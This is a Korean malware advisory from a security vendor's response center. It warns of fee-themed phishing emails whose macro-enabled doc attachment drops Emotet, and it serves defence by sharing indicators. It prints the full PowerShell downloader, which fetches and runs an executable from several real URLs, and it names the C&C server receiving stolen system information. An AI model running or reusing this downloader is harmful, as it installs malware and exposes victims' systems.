악성 매크로가 포함된 수수료 관련 악성 메일 주의!

안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다.

악성 매크로가 포함된 수수료 관련 악성 메일이 국내에 유포되고 있어 주의를 당부 드립니다.

※ 관련글 보기

▶ 매크로를 이용한 송장 관련 악성 메일 유포 주의

▶ Trojan.Agent.Emotet 악성코드 분석 보고서

▶ [업데이트][주의] 견적서를 위장한 악성메일 지속적으로 유포중! 사용자들의 주의 필요

▶ 특정 기업의 프로젝트 파일처럼 위장한 악성 메일 유포 주의

▶ 국내 실제 기업명을 사칭한 악성 메일 유포 주의

이번에 발견된 악성메일은 수수료에 관련된 내용으로, project-agreement 제목의 악성 매크로가 포함된 doc 파일이 첨부되어 있습니다. 

사용자가 해당 파일을 실행하면 매크로 활성화를 유도하며, 사용자가 매크로 기능을 활성화 하면 난독화된 스크립트를 이용해 cmd.exe 프로세스를 실행하고, cmd.exe 프로세스는 powershell.exe 프로세스를 이용해 스크립트를 실행합니다. 

스크립트는 공격자가 접속 가능한 C&C 서버를 조회하면서 EMOTET 악성코드 파일을 다운로드 합니다. 분석 시에는 ‘hxxp://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq’ 사이트에 접속 후 %temp% 폴더 하위 경로에 ‘865.exe’라는 이름으로 파일 다운로드 및 실행을 하였습니다.

powershell.exe  "$udm='kuH';$qtJ=new-object Net.WebClient;$zDq='http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq@http://13.114.25.231/NF4@http://arcelectricnj.com/D@http://lakunat.ru/N@http://paulofodra.com.br/t9Nf'.Split

('@');$kpu='NRE';$quw = '865';$dFd='bbt';$tZi=$env:temp+'\'+$quw+'.exe';foreach($YAi in $zDq){try{$qtJ.DownloadFile($YAi, $tZi);$uAE='sMa';If ((Get-Item $tZi).length -ge 80000) {Invoke-Item $tZi;$irN='ZtE';break;}}catch{}}$lDj='Zib';"

다운로드 된 악성코드는 드롭퍼로써  

C:\Users\[사용자PC]\AppData\Local\archivetebbtn\ 경로 아래에 archivetabbtn.exe 파일을 드롭 및 실행합니다. 최종적으로 실행된 archivetabbtn.exe 코드는 사용자 PC 시스템 정보(프로세스 목록, OS버전, 아키텍처)를 수집하고 C&C(189.223.176.239.dsi.dyn.telnor.net:7080) 서버로 전송합니다.

현재 알약에서는 해당 악성코드들에 대해 Trojan.Downloader.DOC.gen, Trojan.Downloader.W97M.Gen, Trojan.Agent.Emotet으로 탐지중에 있습니다.